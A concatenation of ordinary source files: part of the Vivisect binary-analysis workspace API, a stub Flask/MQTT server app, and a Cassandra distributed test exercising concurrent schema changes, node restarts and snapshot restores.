substring of some outer one # still make this string location, but let the parent know about us too and our # children as well. Ultimately, the outermost parent should be responsible for # knowing about all it's substrings modified = False pva, psize, ptype, pinfo = ploc if (va, size) not in pinfo: modified = True pinfo.append((va, size)) for sva, ssize in subs: if (sva, ssize) not in pinfo: modified = True pinfo.append((sva, ssize)) if modified: tinfo = pinfo else: tinfo = subs return tinfo def makeString(self, va, size=None): """ Create a new string location at the given VA. You may optionally specify size. If size==None, the string will be parsed as a NULL terminated ASCII string. Substrings are also handled here. Generally, the idea is: * if the memory range is completey undefined, we just create a new string at the VA specified (provided that asciiStringSize return a size greater than 0 or the parameter size is greater than 0) * if we create a string A at virtual address 0x40 with size 20, and then later a string B at virtual address 0x44, we won't actually make a new location for the string B, but rather add info to the tinfo portion of the location tuple for string A, and when trying to retrieve string B via getLocation, we'll make up a (sort of) fake location tuple for string B, provided that range=True is passed to getLocation * if we create string A at virtual address 0x40, and then later a string B at virtual 0x30 that has a size of 16 or more, we overwrite the string A with the location information for string B, and demote string A to being a tuple of (VA, size) inside of string B's location information. This method only captures suffixes, but perhaps in the future we'll have symbolik resolution that can capture true substrings that aren't merely suffixes. This same formula is applied to unicode detection as well """ if size is None: size = self.asciiStringSize(va) if size <= 0: raise Exception("Invalid String Size: %d" % size) # rip through the desired memory range to populate any substrings subs = self._getSubstrings(va, size, LOC_STRING) tinfo = self._getStrTinfo(va, size, subs) if self.getName(va) is None: m = self.readMemory(va, size-1).replace("\n", "") self.makeName(va, "str_%s_%.8x" % (m[:16],va)) return self.addLocation(va, size, LOC_STRING, tinfo=tinfo) def makeUnicode(self, va, size=None): if size is None: size = self.uniStringSize(va) if size <= 0: raise Exception("Invalid Unicode Size: %d" % size) subs = self._getSubstrings(va, size, LOC_UNI) tinfo = self._getStrTinfo(va, size, subs) if self.getName(va) is None: m = self.readMemory(va, size-1).replace("\n","").replace("\0","") self.makeName(va, "wstr_%s_%.8x" % (m[:16],va)) return self.addLocation(va, size, LOC_UNI, tinfo=tinfo) def addConstModule(self, modname): ''' Add constants declared within the named module to the constants resolver namespace. Example: vw.addConstModule('vstruct.constants.ntstatus') ''' mod = self.loadModule(modname) self.vsconsts.addModule(mod) def addStructureModule(self, namespace, modname): ''' Add a vstruct structure module to the workspace with the given namespace. Example: vw.addStructureModule('ntdll', 'vstruct.defs.windows.win_5_1_i386.ntdll') This allows subsequent struct lookups by names like ''' mod = self.loadModule(modname) self.vsbuilder.addVStructNamespace(namespace, mod) def getStructure(self, va, vstructname): """ Parse and return a vstruct object for the given name. This (like parseOpcode) does *not* require that the location be a struct and will not create one (use makeStructure). """ s = vstruct.getStructure(vstructname) if s is None: s = self.vsbuilder.buildVStruct(vstructname) if s is not None: bytes = self.readMemory(va, len(s)) s.vsParse(bytes) return s def makeStructure(self, va, vstructname, vs=None): """ Make a location which is a structure and will be parsed/accessed by vstruct. You must specify the vstruct name for the structure you wish to have at the location. Returns a vstruct from the location. """ if vs is None: vs = self.getStructure(va, vstructname) self.addLocation(va, len(vs), LOC_STRUCT, vstructname) # Determine if there are any pointers we need make # xrefs for... offset = 0 for p in vs.vsGetPrims(): if isinstance(p, vs_prims.v_ptr): vptr = p.vsGetValue() if self.isValidPointer(vptr): self.addXref(va+offset, vptr, REF_PTR) offset += len(p) return vs def getUserStructNames(self): ''' Retrive the list of the existing user-defined structure names. Example: for name in vw.getUserStructNames(): print('Structure Name: %s' % name) ''' return self.vsbuilder.getVStructCtorNames() def getUserStructSource(self, sname): ''' Get the source code (as a string) for the given user defined structure. Example: ssrc = vw.getUserStructSource('MyStructureThing') ''' return self.getMeta('ustruct:%s' % sname) def setUserStructSource(self, ssrc): ''' Save the input string as a C structure definition for the workspace. User-defined structures may then be applied to locations, or further edited in the future. Example: src = "struct woot { int x; int y; };" vw.setUserStructSource( src ) ''' # First, we make sure it compiles... ctor = vs_cparse.ctorFromCSource( ssrc ) # Then, build one to get the name from it... vs = ctor() cname = vs.vsGetTypeName() self.setMeta('ustruct:%s' % cname, ssrc) return cname def asciiStringSize(self, va): """ Return the size (in bytes) of the ascii string at the specified location (or -1 if no terminator is found in the memory map) """ offset, bytez = self.getByteDef(va) foff = bytez.find('\x00', offset) if foff == -1: return foff return (foff - offset) + 1 def uniStringSize(self, va): """ Return the size (in bytes) of the unicode string at the specified location (or -1 if no terminator is found in the memory map) """ offset, bytez = self.getByteDef(va) foff = bytez.find('\x00\x00', offset) if foff == -1: return foff return (foff - offset) + 2 def addLocation(self, va, size, ltype, tinfo=None): """ Add a location tuple. """ ltup = (va, size, ltype, tinfo) #loc = self.locmap.getMapLookup(va) #if loc is not None: #raise Exception('Duplicate Location: (is: %r wants: %r)' % (loc,ltup)) self._fireEvent(VWE_ADDLOCATION, ltup) return ltup def getLocations(self, ltype=None, linfo=None): """ Return a list of location objects from the workspace of a particular type. """ if ltype is None: return list(self.loclist) if linfo is None: return [ loc for loc in self.loclist if loc[2] == ltype ] return [ loc for loc in self.loclist if (loc[2] == ltype and loc[3] == linfo) ] def isLocation(self, va, range=False): """ Return True if the va represents a location already. """ if self.getLocation(va, range=range) is not None: return True return False def isLocType(self, va, ltype): """ You may use this to test if a given VA represents a location of the specified type. example: if vw.isLocType(0x41414141, LOC_STRING): print("string at: 0x41414141") """ tup = self.getLocation(va) if tup is None: return False return tup[L_LTYPE] == ltype def getLocation(self, va, range=True): """ Return the va,size,ltype,tinfo tuple for the given location. (specify range=True to potentially match a va that is inside a location rather than the beginning of one, this behavior only affects strings/substring retrieval currently) """ loc = self.locmap.getMapLookup(va) if not loc: return loc if range and loc[L_LTYPE] in (LOC_STRING, LOC_UNI): # dig into any sublocations that may have been created, trying to find the best match # possible, where "best" means the substring that both contains the va, and has no substrings # that contain the va. if not loc[L_TINFO]: return loc subs = sorted(loc[L_TINFO], key=lambda k: k[0], reverse=False) ltup = loc for sva, ssize in subs: if sva <= va < sva + ssize: ltup = (sva, ssize, loc[L_LTYPE], []) return ltup else: return loc def getLocationRange(self, va, size): """ A "location range" is a list of location tuples where undefined space *will* be represented by LOC_UNDEF tuples to provide a complete accounting of linear workspace. """ ret = [] endva = va+size undefva = None while va < endva: ltup = self.getLocation(va) if ltup is None: if undefva is None: undefva = va va += 1 else: if undefva is not None: ret.append((undefva, va-undefva, LOC_UNDEF, None)) undefva = None ret.append(ltup) va += ltup[L_SIZE] # Mop up any hanging udefs if undefva is not None: ret.append((undefva, va-undefva, LOC_UNDEF, None)) return ret def delLocation(self, va): """ Delete the given Location object from the binary (removes any xrefs/etc for the location as well) This will raise InvalidLocation if the va is not an exact match for the beginning of a location. """ loc = self.getLocation(va) if loc is None: raise InvalidLocation(va) # remove xrefs from this location for xref in self.getXrefsFrom(va): self.delXref(xref) self._fireEvent(VWE_DELLOCATION, loc) def getRenderInfo(self, va, size): """ Get nearly everything needed to render a workspace area to a display. This function *greatly* speeds up interface code and is considered "tightly coupled" with the asmview code. (and is therefore subject to change). """ locs = [] funcs = {} names = {} comments = {} extras = {} for loc in self.getLocationRange(va, size): lva, lsize, ltype, tinfo = loc locs.append(loc) name = self.getName(lva) isfunc = self.isFunction(lva) cmnt = self.getComment(lva) if name is not None: names[lva] = name if isfunc == True: funcs[lva] = True if cmnt is not None: comments[lva] = cmnt if ltype == LOC_UNDEF: # Expand out all undefs so we can send all the info endva = lva + lsize while lva < endva: uname = self.getName(lva) ucmnt = self.getComment(lva) if uname is not None: names[lva] = uname if ucmnt is not None: comments[lva] = ucmnt #ret.append(((lva, 1, LOC_UNDEF, None), self.getName(lva), False, self.getComment(lva))) lva += 1 elif ltype == LOC_OP: extras[lva] = self.parseOpcode(lva) elif ltype == LOC_STRUCT: extras[lva] = self.getStructure(lva, tinfo) return locs, funcs, names, comments, extras def getPrevLocation(self, va, adjacent=True): """ Get the previous location behind this one. If adjacent is true, only return a location which is IMMEDIATELY behind the given va, otherwise search backward for a location until you find one or hit the edge of the segment. """ va -= 1 ret = self.locmap.getMapLookup(va) if ret is not None: return ret if adjacent: return None va -= 1 while va > 0: ret = self.locmap.getMapLookup(va) if ret is not None: return ret va -= 1 return None def vaByName(self, name): return self.va_by_name.get(name, None) def getLocationByName(self, name): """ Return a location object by the name of the location. """ va = self.vaByName(name) if va is None: raise InvalidLocation(0, "Unknown Name: %s" % name) return self.getLocation(va) def getNames(self): """ Return a list of tuples containing (va, name) """ return self.name_by_va.items() def getName(self, va, smart=False): ''' Returns the name of the specified virtual address (or None). Smart mode digs beyond simple name lookups, as follows: If va falls within a known function in the workspace, we return "funcname+<delta>". If not, and the va falls within a mapped binary, we return "filename+<delta>" ''' name = self.name_by_va.get(va) if name is not None or not smart: return name # TODO: by previous symbol? # by function baseva = self.getFunction(va) basename = self.name_by_va.get(baseva, None) if self.isFunction(va): basename = 'sub_0%x' % va # by filename if basename is None: basename = self.getFileByVa(va) if basename is None: return None baseva = self.getFileMeta(basename, 'imagebase') delta = va - baseva if delta: pom = ('', '+')[delta>0] name = "%s%s%s" % (basename, pom, hex(delta)) else: name = basename return name def makeName(self, va, name, filelocal=False, makeuniq=False): """ Set a readable name for the given location by va. There *must* be a Location defined for the VA before you may name it. You may set a location's name to None to remove a name. makeuniq allows Vivisect to append some number to make the name unique. This behavior allows for colliding names (eg. different versions of a function) to coexist in the same workspace. default behavior is to fail on duplicate (False). """ if filelocal: segtup = self.getSegment(va) if segtup is None: self.vprint("Failed to find file for 0x%.8x (%s) (and filelocal == True!)" % (va, name)) if segtup is not None: fname = segtup[SEG_FNAME] if fname is not None: name = "%s.%s" % (fname, name) oldva = self.vaByName(name) # If that's already the name, ignore the event if oldva == va: return if oldva is not None: if not makeuniq: raise DuplicateName(oldva, va, name) else: logger.debug('makeName: %r already lives at 0x%x', name, oldva) # tack a number on the end index = 0 newname = "%s_%d" % (name, index) newoldva = self.vaByName(newname) while self.vaByName(newname) not in (None, newname): # if we run into the va we're naming, that's the name still if newoldva == va: return newname logger.debug('makeName: %r already lives at 0x%x', newname, newoldva) index += 1 newname = "%s_%d" % (name, index) newoldva = self.vaByName(newname) name = newname self._fireEvent(VWE_SETNAME, (va,name)) return name def saveWorkspace(self, fullsave=True): if self.server is not None: return modname = self.getMeta("StorageModule") filename = self.getMeta("StorageName") if modname is None: raise Exception("StorageModule not specified!") if filename is None: raise Exception("StorageName not specified!") # Usually this is "vivisect.storage.basicfile mod = self.loadModule(modname) # If they specified a full save, *or* this event list # has never been saved before, do a full save. if fullsave: mod.saveWorkspace(self, filename) else: mod.saveWorkspaceChanges(self, filename) self._createSaveMark() def loadFromFd(self, fd, fmtname=None, baseaddr=None): """ Read the first bytes of the file descriptor and see if we can identify the type. If so, load up the parser for that file type, otherwise raise an exception. Returns file md5 """ mod = None fd.seek(0) if fmtname is None: bytes = fd.read(32) fmtname = viv_parsers.guessFormat(bytes) mod = viv_parsers.getParserModule(fmtname) if hasattr(mod, "config"): self.mergeConfig(mod.config) fd.seek(0) filename = hashlib.md5( fd.read() ).hexdigest() fname = mod.parseFd(self, fd, filename, baseaddr=baseaddr) self.initMeta("StorageName", filename+".viv") # Snapin our analysis modules self._snapInAnalysisModules() return fname def _saveSymbolCaches(self): if not self.config.vdb.SymbolCacheActive: return pathstr = self.config.vdb.SymbolCachePath symcache = e_symcache.SymbolCachePath(pathstr) symsbyfile = collections.defaultdict(list) # Get the image base addresses imgbases = {} for fname in self.getFiles(): imgbases[ fname ] = self.getFileMeta(fname,'imagebase') for va,name in self.name_by_va.items(): mmap = self.getMemoryMap(va) if mmap is None: continue symva = va - imgbases.get(mmap[3], va) if symva: symtype = e_resolv.SYMSTOR_SYM_SYMBOL if self.isFunction(va): symtype = e_resolv.SYMSTOR_SYM_FUNCTION symsbyfile[mmap[3]].append((symva, 0, name, symtype)) for filenorm, symtups in symsbyfile.items(): symhash = self.getFileMeta(filenorm, 'SymbolCacheHash') if symhash is None: continue self.vprint('Saving Symbol Cache: %s (%d syms)' % (symhash,len(symtups))) symcache.setCacheSyms( symhash, symtups ) def loadFromFile(self, filename, fmtname=None, baseaddr=None): """ Read the first bytes of the file and see if we can identify the type. If so, load up the parser for that file type, otherwise raise an exception. ( if it's a workspace, trigger loadWorkspace() as a convenience ) Returns the basename the file was given on load. """ mod = None if fmtname is None: fmtname = viv_parsers.guessFormatFilename(filename) if fmtname in ('viv', 'mpviv'): self.loadWorkspace(filename) return self.normFileName(filename) mod = viv_parsers.getParserModule(fmtname) fname = mod.parseFile(self, filename, baseaddr=baseaddr) self.initMeta("StorageName", filename+".viv") # Snapin our analysis modules self._snapInAnalysisModules() return fname def loadFromMemory(self, memobj, baseaddr, fmtname=None): """ Load a memory map (or potentially a mapped binary file) from the memory object's map at baseaddr. """ mod = None if fmtname is None: bytez = memobj.readMemory(baseaddr, 32) fmtname = viv_parsers.guessFormat(bytez) # TODO: Load workspace from memory? mod = viv_parsers.getParserModule(fmtname) mod.parseMemory(self, memobj, baseaddr) mapva, mapsize, mapperm, mapfname = memobj.getMemoryMap(baseaddr) if not mapfname: mapfname = 'mem_map_%.8x' % mapva self.initMeta('StorageName', mapfname+".viv") # Snapin our analysis modules self._snapInAnalysisModules() def getFiles(self): """ Return the current list of file objects in this workspace. """ return self.filemeta.keys() def normFileName(self, filename): normname = os.path.basename(filename).lower() # Strip off an extension if normname.find('.') != -1: parts = normname.split('.') normname = '_'.join(parts[:-1]) ok = string.letters + string.digits + '_' chars = list(normname) for i in range(len(chars)): if chars[i] not in ok: chars[i] = '_' normname = ''.join(chars) #if normname[0].isdigit(): #normname = '_' + normname return normname def addFile(self, filename, imagebase, md5sum): """ Create and add a new vivisect File object for the specified information. This will return the file object which you may then use to do things like add imports/exports/segments etc... """ nname = self.normFileName(filename) if nname in self.filemeta: raise Exception("Duplicate File Name: %s" % nname) self._fireEvent(VWE_ADDFILE, (nname, imagebase, md5sum)) return nname def addEntryPoint(self, va): ''' Add an entry point to the definition for the given file. This will hint the analysis system to create functions when analysis is run. NOTE: No analysis is triggered by this function. ''' self.setVaSetRow('EntryPoints', (va,)) def getEntryPoints(self): ''' Get all the parsed entry points for all the files loaded into the workspace. Example: for va in vw.getEntryPoints(): ''' return [ x for x, in self.getVaSetRows('EntryPoints') ] def setFileMeta(self, fname, key, value): """ Store a piece of file specific metadata (python primatives are best for values) """ if fname not in self.filemeta: raise Exception("Invalid File: %s" % fname) self._fireEvent(VWE_SETFILEMETA, (fname, key, value)) def getFileMeta(self, filename, key, default=None): """ Retrieve a piece of file specific metadata """ d = self.filemeta.get(filename) if d is None: raise Exception("Invalid File: %s" % filename) return d.get(key, default) def getFileMetaDict(self, filename): ''' Retrieve the file metadata for this file as a key:val dict. ''' d = self.filemeta.get(filename) if d is None: raise Exception('Invalid File: %s' % filename) return d def getFileByVa(self, va): segtup = self.getSegment(va) if segtup is None: return None return segtup[SEG_FNAME] def getLocationDistribution(self): # NOTE: if this changes, don't forget the report module! totsize = 0 for mapva, mapsize, mperm, mname in self.getMemoryMaps(): totsize += mapsize loctot = 0 ret = {} for i in range(LOC_MAX): cnt = 0 size = 0 for lva,lsize,ltype,tinfo in self.getLocations(i): cnt += 1 size += lsize loctot += size tname = loc_type_names.get(i, 'Unknown') ret[i] = (tname, cnt, size, int((size/float(totsize))*100)) # Update the undefined based on totals... undeftot = totsize-loctot ret[LOC_UNDEF] = ('Undefined', 0, undeftot, int((undeftot/float(totsize)) * 100)) return ret ################################################################# # # VA Set API # def getVaSetNames(self): """ Get a list of the names of the current VA lists. """ return self.vasets.keys() def getVaSetDef(self, name): """ Get the list of (name, type) pairs which make up the rows for this given VA set (the first one *always* the VA, but you can name it as you like...) """ x = self.vasetdefs.get(name) if x is None: raise InvalidVaSet(name) return x def getVaSetRows(self, name): """ Get a list of the rows in this VA set. """ x = self.vasets.get(name) if x is None: raise InvalidVaSet(name) return x.values() def getVaSet(self, name): """ Get the dictionary of va:<rowdata> entries. """ x = self.vasets.get(name) if x is None: raise InvalidVaSet(name) return x def addVaSet(self, name, defs, rows=()): """ Add a va set: name - The name for this VA set defs - List of (<name>,<type>) tuples for the rows (va is always first) rows - An initial set of rows for values in this set. """ self._fireEvent(VWE_ADDVASET, (name, defs, rows)) def delVaSet(self, name): """ Delete a VA set by name. """ if name not in self.vasets: raise Exception("Unknown VA Set: %s" % name) self._fireEvent(VWE_DELVASET, name) def setVaSetRow(self, name, rowtup): """ Use this API to update the row data for a particular entry in the VA set. """ self._fireEvent(VWE_SETVASETROW, (name, rowtup)) def getVaSetRow(self, name, va): ''' Retrieve the va set row for va in the va set named name. Example: row = vw.getVaSetRow('WootFunctions', fva) ''' vaset = self.vasets.get( name ) if vaset is None: return None return vaset.get( va ) def delVaSetRow(self, name, va): """ Use this API to delete the rowdata associated with the specified VA from the set. """ if name not in self.vasets: raise Exception("Unknown VA Set: %s" % name) self._fireEvent(VWE_DELVASETROW, (name, va)) ################################################################# # # Shared Workspace APIs # def chat(self, msg): uname = e_config.getusername() # FIXME this should be part of a UI event model. self._fireEvent(VWE_CHAT, (uname, msg)) def iAmLeader(self, winname): ''' Announce that your workspace is leading a window with the specified name. This allows others to opt-in to following the nav events for the given window name. Example: vw.iAmLeader('WindowTitle') ''' if not self.server: raise Exception('iAmLeader() requires being connected to a server.') user = e_config.getusername() self.server._fireEvent(VTE_MASK | VTE_IAMLEADER, (user,winname)) def followTheLeader(self, winname, expr): ''' Announce a new memory expression to navigate to if if a given window is following the specified user/winname Example: vw.followTheLeader('FunExample', 'sub_08042323') ''' if not self.server: raise Exception('followTheLeader() requires being connected to a server.') user = e_config.getusername() self.server._fireEvent(VTE_MASK | VTE_FOLLOWME, (user,winname, expr)) ################################################################# # # Color Map API # def getColorMaps(self): """ Return a list of the names of the given color maps """ return self.colormaps.keys() def addColorMap(self, mapname, colormap): """ Add a colormap dictionary with the given name for the map. (A colormap dictionary is va:color entries) """ self._fireEvent(VWE_ADDCOLOR, (mapname, colormap)) def delColorMap(self, mapname): self._fireEvent(VWE_DELCOLOR, mapname) def getColorMap(self, mapname): """ Return the colormap dictionary for the given map name. """ return self.colormaps.get(mapname) def _getNameParts(self, name, va): ''' Return the given name in three parts: fpart: filename, if applicable (for file-local names) npart: base name vapart: address, if tacked on the end If any of these are not applicable, they will return None for that field. ''' fpart = None npart = name vapart = None fname = self.getFileByVa(va) vastr = '_%.8x' % va if name.startswith(fname + '.'): fpart, npart = name.split('.', 1) elif name.startswith('*.'): skip, npart = name.split('.', 1) if npart.endswith(vastr) and not npart == 'sub' + vastr: npart, vapart = npart.rsplit('_', 1) return fpart, npart, vapart def _addNamePrefix(self, name, va, prefix, joinstr=''): ''' Add a prefix to the given name paying attention to the filename prefix, and any VA suffix which may exist. This is used by multiple analysis modules. Uses _getNameParts. ''' fpart, npart, vapart = self._getNameParts(name, va) if fpart is None and vapart is None: name = joinstr.join([prefix, npart]) elif vapart is None: name = fpart + '.' + joinstr.join([prefix, npart]) elif fpart is None: name = joinstr.join([prefix, npart]) else: name = fpart + '.' + joinstr.join([prefix, npart]) + '_%s' % vapart return name ########################################################## # # The envi.symstore.resolver.SymbolResolver API... # def getSymByName(self, name): # Check for a sym va = self.vaByName(name) if va is not None: return e_resolv.Symbol(name, va, 0) # check for the need for a deref. d = self.filemeta.get(name) if d is not None: return VivFileSymbol(self, name, d.get("imagebase"), 0, self.psize) def getSymByAddr(self, addr, exact=True): name = self.getName(addr) if name is None: if self.isValidPointer(addr): name = "loc_%.8x" % addr if name is not None: #FIXME fname #FIXME functions/segments/etc... return e_resolv.Symbol(name, addr, 0) def setSymHint(self, va, idx, hint): ''' Set a symbol hint which will be used in place of operand values during disassembly among other things... You may also set hint=None to delete sym hints. ''' self._fireEvent(VWE_SYMHINT, (va, idx, hint)) def getSymHint(self, va, idx): h = self.getFref(va, idx) if h is not None: f = self.getFunction(va) loctup = self.getFunctionLocal(f, h) if loctup: return loctup[1] return self.symhints.get((va, idx), None) class VivFileSymbol(e_resolv.FileSymbol): # A namespace tracker thingie... def __init__(self, vw, fname, base, size, width=4): self.vw = vw e_resolv.FileSymbol.__init__(self, fname, base, size, width) def getSymByName(self, name): return self.vw.getSymByName("%s.%s" % (self.name, name)) def getVivPath(*pathents): dname = os.path.dirname(__file__) dname = os.path.abspath(dname) return os.path.join(dname, *pathents)
app.py
from flask import Flask from flask import request, abort # from flask import render_template import helpers.mqtt as mqtt import helpers.secret_parser as secret import helpers.logging as logging import db.db_helper as db from threading import Thread from time import sleep # import sys import json # --end imports # --variables app = Flask(__name__) logger = logging.Logger() database = db.Database() # --end variables # --Flask routing------------------------------------------------ # LOGIN @app.route('/login', methods=['GET', 'POST']) def login(): data = request.get_json(silent=True) if data == None: abort(400) username = data['username'] pass return # USER @app.route('/user', methods=['GET']) def userGet(): return 'forbidden', 403 @app.route('/user', methods=['POST']) def userPost(): return 'forbidden', 403 @app.route('/user', methods=['PUT']) def userPut(): return 'forbidden', 403 @app.route('/user', methods=['DELETE']) def userDelete(): return 'forbidden', 403 # end USER # DEVICE @app.route('/device', methods=['GET']) def deficeGet(): return 'forbidden', 403 @app.route('/device', methods=['POST']) def devicePost(): return 'forbidden', 403 @app.route('/device', methods=['PUT']) def devicePut(): return 'forbidden', 403 @app.route('/device', methods=['DELETE']) def deviceDelete(): return 'forbidden', 403 # end DEVICE # GROUP @app.route('/group', methods=['GET']) def groupGet(): return 'forbidden', 403 @app.route('/group', methods=['POST']) def groupPost(): return 'forbidden', 403 @app.route('/group', methods=['PUT']) def groupPut(): return 'forbidden', 403 @app.route('/group', methods=['DELETE']) def groupDelete(): return 'forbidden', 403 # end GROUP # --------------------------------------------------------------- # --MQTT message handling def runMessageHandler(): logger.logMQTTMsg("thread started") while True: sleep(1) v = mqtt.getMessage() if v == -1: continue # print("[MQTT]--Handling message:topic \"" + v["topic"] + "\", payload \"" + v["payload"] + "\"") logger.logMQTTMsg("received message:topic \"" + v["topic"] + "\", payload \"" + v["payload"] + "\"") # ------ # --Separate thread functions def runFlask(): logger.logFlask("thread started") flaskSecret = secret.retrieve('flask') app.run(host=flaskSecret["host"], port=flaskSecret["port"]) def runMqtt(): logger.logMQTT("thread started") mqttSecret = secret.retrieve('mqtt') mqtt.init(mqttSecret["host"], mqttSecret["port"], mqttSecret["username"], mqttSecret["password"]) mqtt.client.loop_forever() # ------ # --Main functions def main(): print(database.show_db()) mqttThread = Thread(target = runMqtt) mqttThread.start() msgHandlerThread = Thread(target = runMessageHandler) msgHandlerThread.start() logger.logInfo("finished main()") runFlask() if (__name__ == "__main__"): main() # ------
concurrent_schema_changes_test.py
import time, os, pprint, glob, re from threading import Thread from dtest import debug, Tester from ccmlib.node import Node def wait(delay=2): """ An abstraction so that the sleep delays can easily be modified. """ time.sleep(delay) class TestConcurrentSchemaChanges(Tester): def __init__(self, *argv, **kwargs): super(TestConcurrentSchemaChanges, self).__init__(*argv, **kwargs) self.allow_log_errors = True def prepare_for_changes(self, session, namespace='ns1'): """ prepares for schema changes by creating a keyspace and column family. """ debug("prepare_for_changes() " + str(namespace)) # create a keyspace that will be used self.create_ks(session, "ks_%s" % namespace, 2) session.execute('USE ks_%s' % namespace) # create a column family with an index and a row of data query = """ CREATE TABLE cf_%s ( col1 text PRIMARY KEY, col2 text, col3 text ); """ % namespace session.execute(query) wait(1) session.execute("INSERT INTO cf_%s (col1, col2, col3) VALUES ('a', 'b', 'c');" % namespace) # create an index session.execute("CREATE INDEX index_%s ON cf_%s(col2)"%(namespace, namespace)) # create a column family that can be deleted later. query = """ CREATE TABLE cf2_%s ( col1 uuid PRIMARY KEY, col2 text, col3 text ); """ % namespace session.execute(query) # make a keyspace that can be deleted self.create_ks(session, "ks2_%s" % namespace, 2) def make_schema_changes(self, session, namespace='ns1'): """ makes a heap of changes. create keyspace drop keyspace create column family drop column family update column family drop index create index (modify column family and add a key) rebuild index (via jmx) set default_validation_class """ debug("make_schema_changes() " + str(namespace)) session.execute('USE ks_%s' % namespace) # drop keyspace session.execute('DROP KEYSPACE ks2_%s' % namespace) wait(2) # create keyspace self.create_ks(session, "ks3_%s" % namespace, 2) session.execute('USE ks_%s' % namespace) wait(2) # drop column family session.execute("DROP COLUMNFAMILY cf2_%s" % namespace) # create column family query = """ CREATE TABLE cf3_%s ( col1 uuid PRIMARY KEY, col2 text, col3 text, col4 text ); """ % (namespace) session.execute(query) # alter column family query = """ ALTER COLUMNFAMILY cf_%s ADD col4 text; """ % namespace session.execute(query) # add index session.execute("CREATE INDEX index2_%s ON cf_%s(col3)"%(namespace, namespace)) # remove an index session.execute("DROP INDEX index_%s" % namespace) def validate_schema_consistent(self, node): """ Makes sure that there is only one schema """ debug("validate_schema_consistent() " + node.name) response = node.nodetool('describecluster', True)[0] schemas = response.split('Schema versions:')[1].strip() num_schemas = len(re.findall('\[.*?\]', schemas)) assert num_schemas == 1, "There were multiple schema versions: " + pprint.pformat(schemas) def basic_test(self): """ make several schema changes on the same node. """ debug("basic_test()") cluster = self.cluster cluster.populate(2).start() node1 = cluster.nodelist()[0] wait(2) session = self.cql_connection(node1) self.prepare_for_changes(session, namespace='ns1') self.make_schema_changes(session, namespace='ns1') def changes_to_different_nodes_test(self): debug("changes_to_different_nodes_test()") cluster = self.cluster cluster.populate(2).start() [node1, node2] = cluster.nodelist() wait(2) cursor = self.cql_connection(node1) self.prepare_for_changes(cursor, namespace='ns1') self.make_schema_changes(cursor, namespace='ns1') wait(3) self.validate_schema_consistent(node1) # wait for changes to get to the first node wait(20) cursor = self.cql_connection(node2) self.prepare_for_changes(cursor, namespace='ns2') self.make_schema_changes(cursor, namespace='ns2') wait(3) self.validate_schema_consistent(node1) # check both, just because we can self.validate_schema_consistent(node2) def changes_while_node_down_test(self): """ makes schema changes while a node is down. Make schema changes to node 1 while node 2 is down. Then bring up 2 and make sure it gets the changes. """ debug("changes_while_node_down_test()") cluster = self.cluster cluster.populate(2).start() [node1, node2] = cluster.nodelist() wait(2) cursor = self.patient_cql_connection(node2) self.prepare_for_changes(cursor, namespace='ns2') node1.stop() wait(2) self.make_schema_changes(cursor, namespace='ns2') wait(2) node2.stop() wait(2) node1.start() node2.start() wait(20) self.validate_schema_consistent(node1) def changes_while_node_toggle_test(self): """ makes schema changes while a node is down. Bring down 1 and change 2. Bring down 2, bring up 1, and finally bring up 2. 1 should get the changes. """ debug("changes_while_node_toggle_test()") cluster = self.cluster cluster.populate(2).start() [node1, node2] = cluster.nodelist() wait(2) cursor = self.patient_cql_connection(node2) self.prepare_for_changes(cursor, namespace='ns2') node1.stop() wait(2) self.make_schema_changes(cursor, namespace='ns2') wait(2) node2.stop() wait(2) node1.start() node2.start() wait(20) self.validate_schema_consistent(node1) def decommission_node_test(self): debug("decommission_node_test()") cluster = self.cluster cluster.populate(1) # create and add a new node, I must not be a seed, otherwise # we get schema disagreement issues for awhile after decommissioning it. node2 = Node('node2', cluster, True, ('127.0.0.2', 9160), ('127.0.0.2', 7000), '7200', '0', None) cluster.add(node2, False) [node1, node2] = cluster.nodelist() node1.start() node2.start() wait(2) cursor = self.patient_cql_connection(node1) self.prepare_for_changes(cursor) node2.decommission() wait(30) self.validate_schema_consistent(node1) self.make_schema_changes(cursor, namespace='ns1') # create and add a new node node3 = Node('node3', cluster, True, ('127.0.0.3', 9160), ('127.0.0.3', 7000), '7300', '0', None) cluster.add(node3, True) node3.start() wait(30) self.validate_schema_consistent(node1) def snapshot_test(self): debug("snapshot_test()") cluster = self.cluster cluster.populate(2).start() [node1, node2] = cluster.nodelist() wait(2) cursor = self.cql_connection(node1) self.prepare_for_changes(cursor, namespace='ns2') wait(2) cluster.flush() wait(2) node1.nodetool('snapshot -t testsnapshot') node2.nodetool('snapshot -t testsnapshot') wait(2) self.make_schema_changes(cursor, namespace='ns2') wait(2) cluster.stop() ### restore the snapshots ## # clear the commitlogs and data dirs = ( '%s/commitlogs' % node1.get_path(), '%s/commitlogs' % node2.get_path(), '%s/data/ks_ns2/cf_*/*' % node1.get_path(), '%s/data/ks_ns2/cf_*/*' % node2.get_path(), ) for dirr in dirs: for f in glob.glob(os.path.join(dirr)): if os.path.isfile(f): os.unlink(f) # copy the snapshot. TODO: This could be replaced with the creation of hard links. os.system('cp -p %s/data/ks_ns2/cf_*/snapshots/testsnapshot/* %s/data/ks_ns2/cf_*/' % (node1.get_path(), node1.get_path())) os.system('cp -p %s/data/ks_ns2/cf_*/snapshots/testsnapshot/* %s/data/ks_ns2/cf_*/' % (node2.get_path(), node2.get_path())) # restart the cluster cluster.start() wait(2) self.validate_schema_consistent(node1) def load_test(self): """ apply schema changes while the cluster is under load. """ debug("load_test()") cluster = self.cluster cluster.populate(1).start() node1 = cluster.nodelist()[0] version = cluster.version() wait(2) cursor = self.cql_connection(node1) def stress(args=[]): debug("Stressing") node1.stress(args) debug("Done Stressing") def compact(): debug("Compacting...") node1.nodetool('compact') debug("Done Compacting.") # put some data into the cluster if version < "2.1": stress(['--num-keys=30000']) else: stress(['write', 'n=30000', '-rate', 'threads=8']) # now start stressing and compacting at the same time tcompact = Thread(target=compact) tcompact.start() wait(1) # now the cluster is under a lot of load. Make some schema changes. if version >= "2.1": cursor.execute('USE keyspace1') wait(1) cursor.execute('DROP TABLE standard1') wait(3) cursor.execute('CREATE TABLE standard1 (KEY text PRIMARY KEY)') elif version >= "1.2": cursor.execute('USE "Keyspace1"') wait(1) cursor.execute('DROP COLUMNFAMILY "Standard1"') wait(3) cursor.execute('CREATE COLUMNFAMILY "Standard1" (KEY text PRIMARY KEY)') else: cursor.execute('USE Keyspace1') wait(1) cursor.execute('DROP COLUMNFAMILY Standard1') wait(3) cursor.execute('CREATE COLUMNFAMILY Standard1 (KEY text PRIMARY KEY)') tcompact.join()
wspbus.py
